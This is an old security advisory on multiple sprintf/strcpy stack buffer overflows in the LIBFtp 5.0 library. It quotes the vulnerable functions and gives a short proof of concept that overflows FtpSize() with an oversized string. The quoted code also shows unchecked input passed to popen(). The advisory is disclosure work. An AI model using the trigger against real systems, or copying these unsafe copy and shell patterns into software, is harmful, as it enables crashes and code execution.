LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow

2007.03.21
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

http://www.netsw.org/net/ip/filetrans/ftp/libftp/

>> Description

The library has multiple (sprintf(), strcpy()) buffer overflows in various functions.

>> Source errors

fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()

FtpString is a typedef of a 256-byte array, so each of the functions below copies or formats a caller-supplied string into a fixed 256-byte stack buffer without checking its length (FtpLibrary.h):

typedef char FtpString[256];

..
STATUS FtpChmod(FTP *ftp,char *file,int mode)
{
  FtpString msg;
  sprintf(msg,"SITE CHMOD %03o %s",mode,file);
  return FtpCommand(ftp,msg,"",200,EOF);
}
..

int FtpArchie ( char *what, ARCHIE *result, int len)
{
  FILE *archie;
  FtpString cmd,tmp;
  int i;
  bzero(result,sizeof(result[0])*len);
  sprintf(cmd,"archie -t -l -m %d %s",len,what);
  if ((archie = popen(cmd,"r"))==NULL) return 0;
..

STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
{
  FtpString tmp;
  strcpy(tmp,Message);
  if (strncmp(tmp,"PASS ",5)==0)
  {
    char *p=tmp+5;
    while ( *p != '\0') *p++='*';
  };
..

STATUS FtpOpenDir(FTP * con,char * file)
{
  FtpString command;
  if ( file == NULL || *file == '\0' )
    strcpy(command,"NLST");
  else
    sprintf(command,"NLST %s",file);
  return FtpCommand(con,command,"",120,150,200,EOF);
}
..

int FtpSize(FTP * con, char *filename)
{
  FtpString tmp;
  int i,size;
  strcpy(tmp,"SIZE ");
  strcat(tmp,filename);
  if ( FtpSendMessage(con,tmp) == QUIT )
    return EXIT(con,QUIT);
..

>> POC

The POC passes a 270-byte string, i.e. longer than the 256-byte FtpString, as the filename argument of FtpSize().

#include <FtpLibrary.h>

#define OVF_BUF (270)

int main()
{
  char *buf;
  buf = (char *) malloc(OVF_BUF+1);
  memset(buf, 'A', OVF_BUF);

  // insert function to init ftp connection..
  // insert function to manage ftp connection..

  // calling vulnerable function example FtpSize()
  FtpSize(NULL, buf);

  // insert function to close ftp connection..
  return(0);
}

-- ~ starcadi

